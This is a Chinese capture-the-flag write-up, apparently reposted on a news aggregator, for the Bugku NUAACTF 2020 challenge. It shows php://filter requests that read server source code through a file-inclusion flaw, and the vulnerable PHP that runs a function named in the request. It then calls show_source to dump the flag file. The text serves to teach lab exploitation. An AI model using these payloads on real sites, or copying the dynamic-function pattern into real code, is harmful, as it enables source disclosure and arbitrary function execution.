当前位置: 首页 > news >正文

Bugku NUAACTF 2020 command-injection

前置知识

网络安全 文件包含漏洞-CSDN博客

解题过程

打开靶场、进行信息收集

在源码中发现include文件,直接访问,自动添加了URL参数file

/include.php?file=index

并且自动补齐了index参数,页面也跟初始页面相同,很明显是文件包含漏洞

直接尝试php伪协议读取下已知的源码,根据自动补齐的index参数,可以猜测后端是自动补齐.php,读取index.php:

/include.php?file=php://filter/read=convert.base64-encode/resource=index
<?php print <<<EOT <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> </head> <body> <!--include.php--> <img src="img.jpg" alt="嘉木天下第一" /> </body> </html> EOT; ?>

读取include.php:

/include.php?file=php://filter/read=convert.base64-encode/resource=include
<?php error_reporting(0); @$file = $_GET["file"]; if(isset($file)) { if (preg_match('/http|data|ftp|input|%00|flag/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=100) { echo "<p> error! </p>"; } else { include($file.'.php'); setcookie("tips","createfun.php"); } } else { header('Location:include.php?file=index'); } ?>

可以看到include.php过滤了敏感字符,我们无法直接读取flag

并且我们又看到另一个文件createfun.php,继续读取该文件:

/include.php?file=php://filter/read=convert.base64-encode/resource=createfun
<?php $func = @$_GET['func']; $arg = @$_GET['arg']; if(isset($func)&&isset($arg)){$func($arg,'');}

分析源码,获取两个参数,一个作为函数名,一个作为函数参数,然后会执行函数。

需要注意这个函数有两个参数,后面被自动设置为空,这里很多函数可以用,这里采用show_source,显示flag.php文件内容,这里flag.php可以通过前面include文件得出,也可以扫文件得到:

/createfun.php?func=show_source&arg=flag.php
<?php $flag="nuaactf{php_IS_thE_best_language}"; ?>

总结

一道基础的文件包含漏洞,包含了一些代码审计部分。

http://www.cnnetsun.cn/news/18782.html

相关文章:

  • 终极AEUX完整指南:3步实现设计到动画的完美转换
  • 企业级应用:Dify离线部署在金融行业的实践案例
  • Anystyle智能引用解析工具:科研文献管理的革命性突破
  • 传统vs现代:0603封装手工焊接与自动化贴片效率对比
  • Phigros网页模拟器完整使用教程:零基础打造专属音乐游戏
  • 企业级开源协作平台部署指南:规模化团队的高效解决方案
  • Font Awesome图标定制化:从全量加载到精准裁剪的工程实践
  • np.arange vs 循环:性能对比实测与优化建议
  • Font Awesome图标字体子集化:从性能瓶颈到极致优化的实战指南
  • [N_123]基于springboot房屋租赁管理系统
  • Vue Konva实战手册:构建高效画布应用的完全攻略
  • GPTBots.ai:从零开始构建企业级AI智能体,无需代码经验
  • 洗车行业小程序源码系统一体化智能后台,让管理清晰高效
  • OPENCV(python)--初学之路(十七)二进制鲁棒独立(BRIEF)和定向快速和轮换(ORB)
  • 为什么说PHP程序员一定要学会自我慈悲?
  • Blender终极指南:如何快速导入虚幻引擎PSK和PSA文件
  • 31、深入探索EXT2文件系统:操作、遍历与实现
  • C盘爆满急救指南:安全删除虚拟内存全流程
  • 银河麒麟桌面操作系统V10 SP1 编译ffmpeg-6.1
  • VisionReward-Image终极解析:重塑AI视觉内容的质量评估范式
  • 智能获客系统深度评测与选型指南 2026五款热门获客平台
  • GPT-5.2实战评测:从“聊天“到“干活“,AI助手进化史
  • 算力直降48%:Moonlight-16B凭什么改写大模型效率规则?
  • 终极代码质量检查:TscanCode如何帮助团队提升开发效率的完整指南
  • DLT Viewer终极指南:从入门到精通的嵌入式日志分析完整教程
  • 如何快速批量下载TikTok封面:完整操作指南
  • nvm-desktop终极指南:高效管理Node.js版本控制方案
  • Django开发效率翻倍:5个必知技巧
  • 开源大模型微调与部署实战指南:从零开始掌握LLaMA Factory工具全流程
  • Windows Cleaner:5分钟彻底解决C盘空间不足的终极方案